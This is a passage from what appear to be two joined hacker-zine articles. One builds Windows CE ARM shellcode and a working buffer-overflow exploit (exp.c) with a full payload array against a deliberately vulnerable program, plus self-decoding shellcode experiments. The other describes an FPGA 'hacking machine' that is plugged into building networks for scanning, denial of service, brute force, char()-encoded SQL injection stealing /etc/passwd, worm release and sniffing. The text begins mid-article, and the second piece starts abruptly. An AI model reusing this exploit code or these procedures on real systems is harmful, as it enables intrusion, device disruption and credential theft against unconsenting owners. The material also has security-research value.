invalid address in the range 0xf0000000 - 0xf0010000, and this causes a 
prefetch-abort trap, which is handled by PrefetchAbort, implemented in 
armtrap.s. PrefetchAbort first checks the invalid address: if it is in 
the trap area, it uses ObjectCall to locate the system call and execute 
it; otherwise it calls ProcessPrefAbort to deal with the exception.

There is a formula to calculate the system call address:

0xf0010000-(256*apiset+apinr)*4

The api set handles are defined in PUBLIC\COMMON\SDK\INC\kfuncs.h and 
PUBLIC\COMMON\OAK\INC\psyscall.h, and the apinrs are defined in several 
files; for example, the SH_WIN32 calls are defined in 
PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h.

Well, let's calculate the system call of KernelIoControl. The apiset is 0 
and the apinr is 99, so the system call is 0xf0010000-(256*0+99)*4, which 
is 0xF000FE74. The following is the shellcode implemented via the system 
call:

#include "stdafx.h"

int shellcode[] = {
0xE59F0014, // ldr r0, [pc, #20]
0xE59F4014, // ldr r4, [pc, #20]
0xE3A01000, // mov r1, #0
0xE3A02000, // mov r2, #0
0xE3A03000, // mov r3, #0
0xE1A0E00F, // mov lr, pc
0xE1A0F004, // mov pc, r4
0x0101003C, // IOCTL_HAL_REBOOT
0xF000FE74, // trap address of KernelIoControl
};

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    ((void (*)(void)) & shellcode)();

    return 0;
}

It works fine, and we don't need to search for API addresses. 
--[ 9 - Windows CE Buffer Overflow Exploitation

The hello.cpp is the demonstration vulnerable program:

// hello.cpp
//

#include "stdafx.h"

int hello()
{
    FILE * binFileH;
    char binFile[] = "\\binfile";
    char buf[512];

    if ( (binFileH = fopen(binFile, "rb")) == NULL )
    {
        printf("can't open file %s!\n", binFile);
        return 1;
    }

    memset(buf, 0, sizeof(buf));
    fread(buf, sizeof(char), 1024, binFileH);

    printf("%08x %d\n", &buf, strlen(buf));
    getchar();

    fclose(binFileH);
    return 0;
}

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    hello();
    return 0;
}

The hello function has a buffer overflow problem. It reads data from the 
"binfile" in the root directory into the stack variable "buf" with 
fread(). Because it reads 1KB of content, the stack variable "buf" will 
be overflowed if "binfile" is larger than 512 bytes.

The printf and getchar are just for testing. They have no effect without 
console.dll in the windows directory. The console.dll file comes from the 
Windows Mobile Developer Power Toys.

ARM assembly language uses the bl instruction to call a function. Let's 
look into the hello function:

6:    int hello()
7:    {
22011000   str       lr, [sp, #-4]!
22011004   sub       sp, sp, #0x89, 30
8:        FILE * binFileH;
9:        char binFile[] = "\\binfile";
...
...
26:   }
220110C4   add       sp, sp, #0x89, 30
220110C8   ldmia     sp!, {pc}

"str lr, [sp, #-4]!" is the first instruction of the hello() function. It 
stores the lr register on the stack; the lr register contains the return 
address to hello's caller. The second instruction reserves stack memory 
for the local variables. "ldmia sp!, {pc}" is the last instruction of the 
hello() function. It loads the saved return address from the stack into 
the pc register, and then execution returns into the WinMain function. 
So overwriting the return address stored on the stack gains control when 
the hello function returns.

The memory addresses of the program's variables, both stack and heap, 
depend on the Slot the process was loaded into, and a process may be 
loaded into a different Slot on each start, so the base address always 
changes. We know that slot 0 is mapped from the current process's slot, 
so its stack base address is stable.

The following is the exploit for the hello program:

/* exp.c - Windows CE Buffer Overflow Demo
 *
 */
#include<stdio.h>

#define NOP 0xE1A01001  /* mov r1, r1     */
#define LR  0x0002FC50  /* return address */

int shellcode[] = {
0xEB000026, 0xE3A02004, 0xEB00003A, 0xE24DDF89, 0xE28D0008, 0xE58D0000,
0xE3A03002, 0xE3A02000, 0xE28F1F56, 0xE3A0010A, 0xE1A0E00F, 0xE518F00C,
0xE3A00001, 0xE58D000C, 0xE3A03004, 0xE58D3004, 0xE28D100C, 0xE58D1000,
0xE28F1F5F, 0xE59D0008, 0xE1A0E00F, 0xE518F008, 0xE59D0008, 0xE1A0E00F,
0xE518F004, 0xE28F0C01, 0xE5900000, 0xE3A01000, 0xE3A02000, 0xE3A03000,
0xE1A0E00F, 0xE518F010, 0xE0D020B2, 0xE0D130B2, 0xE3520000, 0x03530000,
0x01A0F00E, 0xE1520003, 0x0AFFFFF8, 0xE1A0F00E, 0xE1A0B00E, 0xE28F40BC,
0xE5944000, 0xE3A05FC9, 0xE0845005, 0xE5955000, 0xE1A06005, 0xE3A07000,
0xE5960008, 0xE28F1F45, 0xEBFFFFEC, 0x0596707C, 0x0596808C, 0xE0879008,
0x0A000003, 0xE5966004, 0xE3560000, 0x11560005, 0x1AFFFFF4, 0xE1A00007,
0xE0881007, 0xE1A0F00B, 0xE28F8070, 0xE5914020, 0xE0844000, 0xE3A06000,
0xE4947004, 0xE0877000, 0xE3A0A000, 0xE4D79001, 0xE3590000, 0x0A000001,
0xE089A3EA, 0xEAFFFFFA, 0xE5989000, 0xE15A0009, 0x12866001, 0x1AFFFFF3,
0xE5915024, 0xE0855000, 0xE0866006, 0xE19590B6, 0xE591501C, 0xE0855000,
0xE7959109, 0xE0899000, 0xE4889004, 0xE2522001, 0x1AFFFFE5, 0xE1A0F00E,
0xFFFFC800, 0x0101003C, 0x283A9DE7, 0x0BF7DF51, 0xD8C0FEC0, 0x0E511783,
0x004F0053, 0x00540046, 0x00410057, 0x00450052, 0x005C005C, 0x00690057,
0x00630064, 0x006D006F, 0x005C006D, 0x0042005C, 0x00430074, 0x006E006F,
0x00690066, 0x005C0067, 0x0047005C, 0x006E0065, 0x00720065, 0x006C0061,
0x00000000, 0x00740053, 0x00630061, 0x004D006B, 0x0064006F, 0x00000065,
0x006F0063, 0x00650072, 0x006C0064, 0x002E006C, 0x006C0064, 0x0000006C,
};

/* prints a long to a string */
char* put_long(char* ptr, long value)
{
    *ptr++ = (char) (value >> 0) & 0xff;
    *ptr++ = (char) (value >> 8) & 0xff;
    *ptr++ = (char) (value >> 16) & 0xff;
    *ptr++ = (char) (value >> 24) & 0xff;

    return ptr;
}

int main()
{
    FILE * binFileH;
    char binFile[] = "binfile";
    char buf[544];
    char *ptr;
    int  i;

    if ( (binFileH = fopen(binFile, "wb")) == NULL )
    {
        printf("can't create file %s!\n", binFile);
        return 1;
    }

    memset(buf, 0, sizeof(buf)-1);
    ptr = buf;

    for (i = 0; i < 4; i++) {
        ptr = put_long(ptr, NOP);
    }
    memcpy(buf+16, shellcode, sizeof(shellcode));
    put_long(ptr-16+540, LR);

    fwrite(buf, sizeof(char), 544, binFileH);
    fclose(binFileH);
}

We choose a stack address in slot 0 that points to our shellcode; it 
overwrites the return address stored on the stack. We could also use the 
address of a jump instruction in the process's virtual memory space 
instead. This exploit produces a "binfile" that overflows the "buf" 
variable and the return address stored on the stack.

After the binfile is copied to the PDA, the PDA restarts and enables 
bluetooth when the hello program is executed. That means the hello 
program flowed into our shellcode.

I then tried another way to construct the exploit string, as follows:

pad...pad|return address|nop...nop...shellcode

This exploit produces a 1KB "binfile", but the PDA freezes when the hello 
program is executed. This was confusing; I think the stack of Windows CE 
is small and the overflow string destroyed the 2KB guard at the top of 
the stack. The program freezes when it calls an API after the overflow 
occurs. So we must mind the characteristics of the stack while writing 
exploits for Windows CE. 
EVC has some bugs that make debugging difficult. First, EVC writes some 
arbitrary data into the stack contents when the stack is released at the 
end of a function, so the shellcode may be modified. Second, the 
instruction at a breakpoint may change to 0xE6000010 in EVC while 
debugging. Another bug is funny: the debugger reports no error when 
writing data to a .text address during single-stepping, but direct 
execution catches an access violation exception.


--[ 10 - About Decoding Shellcode

The shellcode we discussed above is a proof-of-concept shellcode which 
contains lots of zeros. It executes correctly in this demonstration 
program, but other vulnerable programs may filter special characters 
before the buffer overflow occurs. For example, when the overflow happens 
via strcpy, the shellcode will be cut at the first zero.

It is difficult and inconvenient to write a shellcode free of special 
characters with the API search method. So we consider a decoding 
shellcode instead. A decoder converts the special characters into 
acceptable ones, which makes the real shellcode more universal.

Newer ARM processors (such as the arm9 and arm10) have a Harvard 
architecture which separates the instruction cache and the data cache. 
This feature improves processor performance, and most RISC processors 
have it. But self-modifying code is not easy to implement on them, 
because after being modified it can be confused by the caches and by the 
processor implementation. 
Let's look at the following code first:

#include "stdafx.h"

int weird[] = {
0xE3A01099, // mov       r1, #0x99
0xE5CF1020, // strb      r1, [pc, #0x20]
0xE5CF1020, // strb      r1, [pc, #0x20]
0xE5CF1020, // strb      r1, [pc, #0x20]
0xE5CF1020, // strb      r1, [pc, #0x20]

0xE1A01001, // mov       r1, r1 ; pad
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,

0xE3A04001, // mov       r4, #0x1
0xE3A03001, // mov       r3, #0x1
0xE3A02001, // mov       r2, #0x1
0xE3A01001, // mov       r1, #0x1
0xE6000010, // breakpoint
};

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    ((void (*)(void)) & weird)();

    return 0;
}

The four strb instructions change the immediate value of the mov 
instructions below them to 0x99. Executing this code directly in the EVC 
debugger, it breaks at the inserted breakpoint, and the r1-r4 registers 
got 0x99 on the S3C2410, which has an arm9 core. When I tested this code 
on my friend's PDA, which has an Intel XScale processor, more nop 
instructions were needed as padding after the modification before r1-r4 
got 0x99. I think the reason may be that the arm9 has a 5-stage pipeline 
while the arm10 has a 6-stage pipeline. 
Well, I changed it to another method:

0xE28F3053, // add       r3, pc, #0x53

0xE3A01010, // mov       r1, #0x10
0xE7D32001, // ldrb      r2, [r3, +r1]
0xE2222088, // eor       r2, r2, #0x88
0xE7C32001, // strb      r2, [r3, +r1]
0xE2511001, // subs      r1, r1, #1
0x1AFFFFFA, // bne       28011008

//0xE1A0100F, // mov       r1, pc
//0xE3A02020, // mov       r2, #0x20
//0xE3A03D05, // mov       r3, #5, 26
//0xEE071F3A, // mcr       p15, 0, r1, c7, c10, 1 ; clean and invalidate each entry
//0xE0811002, // add       r1, r1, r2
//0xE0533002, // subs      r3, r3, r2
//0xCAFFFFFB, // bgt       |weird+28h (30013058)|
//0xE0211001, // eor       r1, r1, r1
//0xEE071F9A, // mcr       p15, 0, r1, c7, c10, 4 ; drain write buffer
//0xEE071F15, // mcr       p15, 0, r1, c7, c5, 0  ; flush the icache

0xE1A01001, // mov       r1, r1 ; pad
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,
0xE1A01001,

0x6B28C889, // mov       r4, #0x1 ; encoded
0x6B28B889, // mov       r3, #0x1
0x6B28A889, // mov       r2, #0x1
0x6B289889, // mov       r1, #0x1
0xE6000010, // breakpoint

The four mov instructions were encoded by XORing with 0x88; the decoder 
loops, loading each encoded byte, XORing it with 0x88, and storing it 
back to its original position. After decoding, the r1-r4 registers won't 
get 0x1 on either arm9 or arm10 processors, even if you put a lot of pad 
instructions after the decoder. I think the load instruction brings on a 
cache problem.

The ARM Architecture Reference Manual has a chapter introducing how to 
deal with self-modifying code. It says the caches should be flushed by an 
operating system call. Phil, the guy from 0dd, shared his experience with 
me. He said he has used this method successfully on an ARM system (I 
think his environment may be Linux). Well, this method works on AIX 
PowerPC and Solaris SPARC too (I've tested it). 
But SWI is implemented in a different way under Windows CE. armtrap.s 
contains the implementation of SWIHandler, which does nothing except 
'movs pc, lr'. So the OS-call approach has no effect after decoding 
finishes.

Because Pocket PC applications run in kernel mode, we have the privilege 
to access the system control coprocessor. The ARM Architecture Reference 
Manual introduces the memory system and how to handle the caches via the 
system control coprocessor. After looking into this manual, I tried to 
disable the instruction cache before decoding:

mrc     p15, 0, r1, c1, c0, 0
bic     r1, r1, #0x1000
mcr     p15, 0, r1, c1, c0, 0

But the system froze when the mcr instruction executed. Then I tried to 
invalidate the entire instruction cache after decoding:

eor     r1, r1, r1
mcr     p15, 0, r1, c7, c5, 0

But that had no effect either.


--[ 11 - Conclusion

The code discussed above is a real-life buffer overflow example on 
Windows CE. It is not perfect, but I think this technique will be 
improved in the future.

Because of the cache mechanism, the decoding shellcode is not good 
enough yet.

The Internet and handset devices are growing quickly, so threats to PDAs 
and mobiles are becoming more and more serious. And patching Windows CE 
is more difficult and dangerous for customers than patching a normal 
Windows system: because the entire Windows CE system is stored in ROM, 
patching system flaws means reflashing the ROM, and the ROM images of 
various vendors and models of PDAs and mobiles aren't compatible.

Hacking with Embedded Systems

    1. - Introduction

    2. - Architectures Classification

    3. - Hacking with Embedded System

    4. - Hacking with Embedded Linux

    5. - "Hacking Machine" Implementation In FPGA

    6. - What Are The Advantages Of Using FPGA In Hacking ?

    7. - What Other Magic Can Embedded Linux Do ?

    8. - Conclusion

--[ 1. - Introduction

    Embedded systems have penetrated daily human life. In residential 
homes, the deployment of "smart" systems has brought about the term 
"smart home", dealing with home security, control and monitoring of 
electronic appliances, audio/video-based entertainment, home 
networking, etc. In building automation, embedded systems provide 
network capability (LonWorks, BACnet, or X10) for extra-convenient 
control and monitoring. For intra-building communication, the physical 
network media include power-line, RS485, optical fiber, RJ45, IrDA, 
and RF; here a media gateway plays the role of inter-media interface 
for the system. As for personal handheld systems, mobile devices such 
as handphones/smartphones and PDAs/XDAs are becoming necessities of 
human life. However, the growth of 3G has not been as good as 
initially planned; its slow adoption is due to its lack of direct 
compatibility with TCP/IP. As a result, 4G with Wimax technology is 
what the communication industry is more likely to look forward to, 
given its wireless broadband with OFDM. 

    Obviously, the development trend of embedded systems applications 
is convergence - applying TCP/IP as the "protocol glue" for 
inter-media interfacing. Since deploying IPv6 would incur an 
unreasonably high cost, widespread IPv6 products will still need some 
extra time to arrive. As a result, IPv4 will continue to dominate the 
world of networking, especially in embedded applications. As we know, 
the aging IPv4 is challenged by its native security problems in terms 
of confidentiality, integrity, and authentication. Value-added modules 
such as SSL and SSH would be the best protection against most attacks, 
such as denial of service, hijacking, spoofing, and sniffing. However, 
implementing such value-added modules in an embedded system is often 
not an option because of the lack of hardware resources. For example, 
it is not reasonable to implement SSL in a SitePlayer[1] for a 
complicated web-based control and monitoring system, considering the 
flash and memory available. 

    As IPv4 conquers the embedded systems world, the native 
characteristics of IPv4 and the reduced structure of embedded systems 
become security problems - hidden time-bombs waiting to be exploited. 
As an example, by simply performing a port scan with pattern 
recognition across a range of IP addresses, any running SC12 
IPC@CHIP[2] can be identified and exposed. Once the IP address of a 
running SC12 is confirmed, a sequence of five ping packets with a 
length of 65500 is sufficient to crash it until reset. 

--[ 2. - Architectures Classification

    With the advent of commodity electronics in the 1980s, digital 
utility began to proliferate beyond the world of technology and 
industry. By its nature a digital signal can be represented exactly 
and easily, which gives it much more utility. In terms of digital 
system design, programmable logic has a primary advantage over custom 
gate arrays and standard cells: faster time-to-market and shorter 
design cycles. Using software, a digital design can be programmed 
directly into programmable logic, allowing revisions to be made 
relatively quickly. The two major types of programmable logic devices 
are Field Programmable Gate Arrays (FPGAs) and Complex Programmable 
Logic Devices (CPLDs). FPGAs offer the highest logic density, the most 
features, and the highest performance. These advanced devices also 
offer features such as built-in hardwired processors (such as the IBM 
PowerPC), substantial amounts of memory, clock management systems, and 
support for many of the latest very fast device-to-device signaling 
technologies. FPGAs are used in a wide variety of applications, 
ranging from data processing and storage to instrumentation, 
telecommunications, and digital signal processing. CPLDs, by contrast, 
offer much smaller amounts of logic (approximately 10,000 gates), but 
very predictable timing characteristics, which makes them ideal for 
critical control applications. Besides, CPLDs also require extremely 
low amounts of power and are very inexpensive. 
    Now it is time to discuss the Hardware Description Language (HDL). 
An HDL is a software programming language used to model the intended 
operation of a piece of hardware. There are two aspects to the 
description of hardware that an HDL facilitates: true abstract 
behavioral modeling and hardware structure modeling. The behavior of 
hardware may be modeled and represented at various levels of 
abstraction during the design process. Higher-level models describe 
the operation of hardware abstractly, while lower-level models include 
more detail, such as inferred hardware structure. There are two major 
HDLs: VHDL and Verilog-HDL. The history of VHDL starts in 1980, when 
the US Department of Defense (DoD) wanted to make circuit design 
self-documenting, follow a common design methodology, and be reusable 
with new technologies. It became clear there was a need for a standard 
programming language for describing the function and structure of 
digital circuits for the design of integrated circuits (ICs). The DoD 
funded a project under the Very High Speed Integrated Circuit (VHSIC) 
program to create such a standard hardware description language. The 
result was the creation of the VHSIC hardware description language, or 
VHDL as it is now commonly known. The history of Verilog-HDL starts in 
1981, when the CAE software company Gateway Design Automation was 
founded by Prabhu Goel. One of Gateway's first employees was Phil 
Moorby, an original author of GenRad's Hardware Description Language 
(GHDL) and the HILO simulator. In 1983, Gateway released the Verilog 
Hardware Description Language, known as Verilog-HDL or simply Verilog, 
together with a Verilog simulator. VHDL and Verilog-HDL were reviewed 
and adopted by the IEEE as standards 1076 and 1364, respectively.

    Modern hardware implementations of embedded systems can be 
classified into two categories: hardcore processing and softcore 
processing. Hardcore processing applies a hard processor such as an 
ARM, MIPS, or x86 as the processing unit, with an integrated protocol 
stack. For example, the SC12 with x86, the IP2022 with Scenix RISC, 
the eZ80, SitePlayer, and Rabbit fall into the category of hardcore 
processing. Softcore processing, in contrast, applies a synthesizable 
core that can be targeted to different semiconductor fabrics. The 
semiconductor fabric should be programmable, as FPGAs and CPLDs are. 
Altera[3] and Xilinx[4] are the only FPGA/CPLD manufacturers on the 
market that support softcore processors. Altera provides the NIOS 
processor, which can be implemented in SOPC Builder and targeted to 
its Cyclone and Stratix FPGAs. Xilinx provides two types of softcore: 
PicoBlaze, targeted to its CoolRunner-2 CPLD, and MicroBlaze, targeted 
to its Spartan and Virtex FPGAs. FPGAs with an embedded hardcore - for 
example, the ARM core in Stratix or the MIPS core in Virtex - are 
classified as embedded hardcore processing. On the other hand, FPGAs 
with an embedded softcore, such as a NIOS core in Cyclone or Stratix 
or a MicroBlaze core in Spartan or Virtex, are classified as softcore 
processing. Furthermore, an embedded softcore can be associated with 
other synthesizable peripherals, such as a DMA controller, for 
advanced processing purposes. 

    In general, the classical point of view on hardcore processing 
might assume it always runs faster than softcore processing. However, 
this is not the case. Processor performance is often limited by how 
fast instructions and data can be pipelined from external memory into 
the execution unit. As a result, hardcore processing is more suitable 
for general-purpose applications, while softcore processing is better 
suited to customized applications with parallel processing and DSP, 
targeting flexible implementation in adaptive computing.

--[ 3. - Hacking with Embedded System

    When the advantages of softcore processing are applied to hacking, 
more creative methods of attack emerge - the only limitation is 
imagination. Richard Clayton has shown a method of extracting a 3DES 
key from an IBM 4758 running the Common Cryptographic Architecture 
(CCA)[5]. The IBM 4758 with its CCA software is widely used in the 
banking industry to hold encryption keys securely. The device is 
extremely tamper-resistant, and no physical attack is known that will 
allow keys to be accessed. According to Richard, about 20 minutes of 
uninterrupted access to an IBM 4758 with Combine_Key_Parts permission 
is sufficient to export the DES and 3DES keys. For convenience, one 
would likely implement an embedded system with a customized 
application to grab the keys within those 20 minutes of access to the 
device. Richard Clayton selected an evaluation board from Altera for 
the key export, followed by an additional two days of offline key 
cracking.

    In practice, using multiple NIOS cores with customized peripherals 
would provide better performance in offline key cracking. In fact, 
customized parallel processing is very well suited to cracking both 
symmetric and asymmetric keys.   

--[ 4. - Hacking with Embedded Linux

    For application based hacking, such as buffer overflow and SQL 
injection, it is more preferred to have RTOS installed in the embedded 
system. For code reusability purpose, embedded linux would be the best 
choice of embedded hacking platform. The following examples have clearly 
shown the possible attacks under an embedded platform. The condition of 
the embedded platform is come with a Nios-core in Stratix and  uClinux 
being installed. By recompiling the source code of netcat and make it run 
in uClinux, a swiss army knife is created and ready to perform penetration 
as listed below: -

    a) Port Scan With Pattern Recognition 

        A list of subnets can be defined in the embedded system 
    beforehand, and the system brought into a commercial building. 
    Plug the embedded system into any RJ45 socket in the building, 
    press a button to perform a port scan with pattern recognition, 
    and identify any vulnerable network embedded system in the 
    building. Press another button to launch an attack (denial of 
    service) against the target network embedded system(s). This is a 
    serious problem when the target system(s) are related to the 
    building's evacuation, surveillance, or security systems.

    b) Automatic Brute-Force Attack

        Define the server address(es), dictionary, and brute-force 
    pattern in the embedded system. Again, plug the embedded system 
    into any RJ45 socket in the building and press a button to start 
    the password-guessing process. While this small box sits in a 
    hidden corner at some RJ45 socket, it can carry out the cracking 
    task over days, powered by battery.

    c) LAN Hacking

        By pre-identifying the server address(es), patch versions, and 
    types of service, a structured attack can be launched within the 
    building. For example, define:

        **char(47,101,116,99,47,112,97,115,115,119,100) = /etc/passwd

    in the embedded system initially. Again, plug the embedded system 
    into any RJ45 socket in the building (within the LAN), and press a 
    button to start a SQL injection attack grabbing the password file 
    of a Unix machine in the LAN. The password file is then stored in 
    flash memory, ready to be retrieved for offline cracking. Instead 
    of performing SQL injection, exploits can be used for the same 
    purpose.
    d) Virus/Worm Spreading

        The virus/worm can be pre-loaded in the embedded system. 
    Again, plug the embedded system into any RJ45 socket in the 
    building, press a button to run an exploit against any vulnerable 
    target machine, and release the virus/worm into the LAN.

    e) Embedded Sniffer

        Switch the network interface from normal mode into promiscuous 
    mode and define the sniffing conditions. Again, plug the embedded 
    system into any RJ45 socket in the building and press a button to 
    start the sniffer. To make sure sniffing still works in a switched 
    LAN, an ARP sniffer is recommended for this purpose. 

--[ 5. - "Hacking Machine" Implementation In FPGA

    The implementation of the embedded "hacking machine" will be 
demonstrated on Altera's NIOS development board with a Stratix EP1S10 
FPGA. The board provides a 10/100Base-T ethernet port and a 
compact-flash connector. Two RS-232 ports are also provided, for 
serial interfacing and system configuration respectively. In addition, 
the onboard 1MB of SRAM, 16MB of SDRAM, and 8MB of flash memory are 
ready for embedded Linux installation[6]. The version of embedded 
Linux to be applied is uClinux from Microtronix[7]. 

    OK, that is the specification of the board. Now we start our 
journey of "hacking machine" design. We use three tools provided by 
Altera to implement our "hardware" design; in this case, "hardware" 
means it is synthesizable and designed in Verilog-HDL. The three tools 
are: QuartusII (as synthesis tool), SOPC Builder (as NIOS-core design 
tool), and the C compiler. Other synthesis tools, such as Leonardo 
Spectrum from Mentor Graphics or Synplify from Synplicity, may 
optionally be used for special purposes; in that case the synthesized 
design, in EDIF format, is defined as an external module, and the 
module must be imported into QuartusII to perform place-and-route 
(PAR). The outcome of PAR is the hardware core. For advanced users, 
ModelSim from Mentor Graphics is highly recommended for behavioral and 
post-PAR simulation. Behavioral simulation is a type of functional 
verification of the digital hardware design; timing issues are not yet 
taken into consideration at that stage. Post-PAR simulation, on the 
other hand, is a type of real-case verification: all the real-world 
factors, such as power consumption and timing conditions (in SDF 
format), are taken into consideration. [8,9,10,11,12]

    A reference design is provided by Microtronix, and it is highly 
recommended as the design framework for any custom design, with 
appropriate modifications [13]. For our "hacking machine", the only 
modification we need to make is to assign the interrupts of the four 
onboard push-buttons [14]. Once the design framework is loaded into 
QuartusII, SOPC Builder is ready to start the design of the NIOS core, 
boot ROM, SRAM and SDRAM interfaces, ethernet interface, compact-flash 
interface, and so on. Before generating synthesizable code from the 
design, it is crucial to ensure the "Microtronix uClinux" check-box 
under Software Components is selected (it is in the "More CPU 
Settings" tab of the main configuration window in SOPC Builder). 
Selecting this option builds a uClinux kernel, the uClibc library, and 
some of uClinux's general-purpose applications at the time the 
synthesizable code is generated. Once ready, generate the design as 
synthesizable code in SOPC Builder, then perform PAR in QuartusII to 
get a hardware core. In general, there are two formats of hardware 
core:- 

    a) .sof core:  Downloaded into the EP1S10 directly over JTAG; 
                   requires a re-load if the board is power cycled
                   **(think of it as volatile)

    b) .pof core:  Downloaded into the EPC16 (enhanced configuration
                   device); automatically loaded into the FPGA every 
                   time the board is power cycled
                   **(think of it as non-volatile)

    The raw format of both .sof and .pof hardware cores is .hexout. As 
hackers, we prefer to work on the command line, so we use the 
hexout2flash tool to convert the hardware core from .hexout into 
.flash and relocate the base address of the core to 0x600000 in flash. 
0x600000 is the startup core loading address of the EP1S10. Once the 
.flash file is created, we use the nios-run or nr command to download 
the hardware core into flash memory as follows:

    [Linux Developer] ...uClinux/: nios-run hackcore.hexout.flash

    After nios-run indicates that the download has completed successfully, 
restart the board. The downloaded core will now start as the default core 
whenever the board is restarted.

    Fine, the "hardware" part is complete. Now we look into the 
"software" implementation, starting with uClinux. As stated, SOPC 
Builder has generated a framework of the uClinux kernel, the uClibc 
library, and some uClinux general-purpose applications such as cat, 
mv, and rm.

We start by reconfiguring the kernel using "make xconfig": 

    [Linux Developer] ...uClinux/: cd linux
    [Linux Developer] ...uClinux/: make xconfig

In xconfig, perform appropriate tuning to the kernel, then use 
"make clean" to clean the source tree of any object files.

    [Linux Developer] ...linux/: make clean 

To start building a new kernel, use "make dep" followed by "make". 

    [Linux Developer] ...linux/: make dep
    [Linux Developer] ...linux/: make

To build the linux.flash file for uploading, use "make linux.flash". 

    [Linux Developer] ...uClinux/: make linux.flash

The linux.flash file is defined as the operating system image. As we 
know, an operating system must run with a file system, so we need to 
create a file system image too. First, edit the config file in 
userland/.config to select which application packages get built. For 
example:

    #TITLE agetty

If an application package's corresponding variable is set to 'n' 
(for example, CONFIG_AGETTY=n), then it will not be built and copied 
over to the target/ directory. Then build all the application packages 
specified in userland/.config as follows:

    [Linux Developer] ...userland/: make

Now we copy the pre-compiled netcat into the target/ directory. After 
that, use "make romfs" to generate the file system (romdisk) image. 

    [Linux Developer] ...uClinux/: make romfs

Once completed, the resulting romdisk.flash file is ready to be 
downloaded to the target board. Download the file system image, 
followed by the operating system image, into flash memory:  

    [Linux Developer] ...uClinux/: nios-run -x romdisk.flash
    [Linux Developer] ...uClinux/: nios-run linux.flash

Well, our FPGA-based "hacking machine" is ready now. 

    Let's try using it against a Linux machine with /etc/passwd 
enabled. We assume the target Linux machine is a web server in the LAN 
that uses a MySQL database. We also know that its show.php is 
vulnerable to SQL injection, and we assume it has some security 
protections that filter out certain dangerous symbols, so we decide to 
use the char() method of injection. We assume the table accessed by 
show.php has 8 columns in total.

Now, we define:

    char getpass[]="

as the attacking string, and we store the response data (the content 
of /etc/passwd) in a file named password.dat. By creating a pipe to 
netcat, and at the same time making sure the attacking string is 
triggered by the push-button, our "hacking machine" is ready.

    Plug the "hacking machine" into any RJ45 socket in the LAN, then 
press a button to trigger the attacking string against the target. 
After that, unplug the "hacking machine", connect it to a PC, download 
password.dat from the "hacking machine", and start the cracking 
process. By exploiting the advantages of the FPGA architecture, a 
hardware cracker can be appended for embedded cracking. Any optional 
module can be designed in Verilog-HDL and attached to the FPGA for 
all-in-one hacking purposes. The advantages of FPGA implementation 
over conventional hardcore processors are explored in depth in the 
following section, with case studies, comparisons, and examples.


**An FTP server is recommended to be installed in the "hacking 
machine" for two reasons:

  1) Any new or value-added updates (trojans, exploits, worms,...) to 
     the "hacking machine" can be done through FTP (online update).

  2) The grabbed information (password files, configuration files,...) 
     can be retrieved easily.


**Installation of FTP server in uClinux is done by editing 
  userland/.config file to enable the ftpd service.     

**This is just a demonstration; it is nearly impossible to find a 
  unix/linux machine that does not use file permissions and shadow 
  passwords to protect the password file. This article is intended to 
  show the migration of hacking methodology from PC-based to embedded 
  system based.

--[ 6. - What Are The Advantages Of Using FPGA In Hacking ?

    Well, this is a good question, since someone will ask: with a $50 
Rabbit module, a 9V battery, and 20 lines of Dynamic C, a simple 
"hacking machine" can be implemented - so why use a $300 FPGA 
development board plus a $495 proprietary embedded processor? The 
answer is that the FPGA's architecture provides a very unique feature: 
it is hardware re-programmable. 

    As we know, FPGAs are a well-known platform for algorithm 
verification in hardware implementation, especially in DSP 
applications. The demand for higher bit rates in the wired and 
wireless communications industry has led to the development of 
higher-bit-rate, low-cost serial link interface chips. Based on such 
considerations, programmable channel and band scanning need to be 
digitized and made re-programmable. A new term has been created for 
this type of framework: "software defined radio", or SDR. However, the 
slow adoption of SDR is due to limitations of the Analog-to-Digital 
Converter (ADC) in digitizing the analog demodulation unit of the 
transceiver module. Although the sampling rate of the most advanced 
ADCs does not yet meet the specification of SDR, it will soon. In this 
case, conventional DSP chips such as the TMS320C6200 (for fixed-point 
processing) and TMS320C6700 (for floating-point processing) find it a 
little hard to handle such extremely high bit rates. Of course, 
someone may claim their parallel processing technique could solve the 
problem, using the following symbols in linear assembly language[15].

	Inst1
    ||	Inst2
    ||	Inst3
    ||	Inst4    
    ||	Inst5
    ||	Inst6

    The double-pipe symbols (||) indicate instructions that are in 
parallel with a previous instruction. These five instructions, Inst2 
to Inst6, run in parallel with the first instruction, Inst1. In the 
TMS320, up to eight instructions can run in parallel. However, this is 
not a true parallel method; it performs pipelining in different 
time-slots within a single clock cycle. True parallel processing can 
only be implemented with different sets of hardware modules, so FPGA 
should be the only solution for implementing a true parallel 
processing architecture. The SDR case mentioned above is just one 
example of the limits of data processing in a resource-sharing 
structure. Likewise, when we consider implementing an encryption 
module, the same considerations apply as for data processing: the 
parallel processing method is extremely worthwhile for speeding up the 
key cracking process. Furthermore, it is significant that an 
encryption module implemented in an FPGA is hardware-driven. It is 
totally free of the limitations of any hardcore processor structure, 
which uses a single instruction pointer (or program counter) and 
performs push and pop operations repeatedly on stack memory. These two 
advantages - true-parallel processing and hardware-driven operation - 
nicely illustrate the uniqueness of the FPGA architecture for advanced 
applications. 

    As we go further with the uniqueness of the FPGA architecture, 
more and more interesting issues come into the discussion. For hacking 
purposes, we focus on utilizing the hardware re-programmability of an 
FPGA-based "hacking machine". We ignore "software re-programmability" 
here, because any hardcore processor offers it at lower cost. To apply 
the characteristic of hardware re-programmability, a segment of space 
in flash memory is reserved for the hardware image; in NIOS, it starts 
at 0x600000. This segment can be updated remotely through the network 
interface. In advanced mobile communication, this type of feature is 
starting to be used for hardware bug-fixes as well as module updates 
[16], usually known as Over-The-Air (OTA) technology. For hacking 
purposes, hardware re-programmability makes our "hacking machine" 
general purpose: it can come with a hardware-driven DES cracker and 
easily be changed into an MD5 cracker or any other type of 
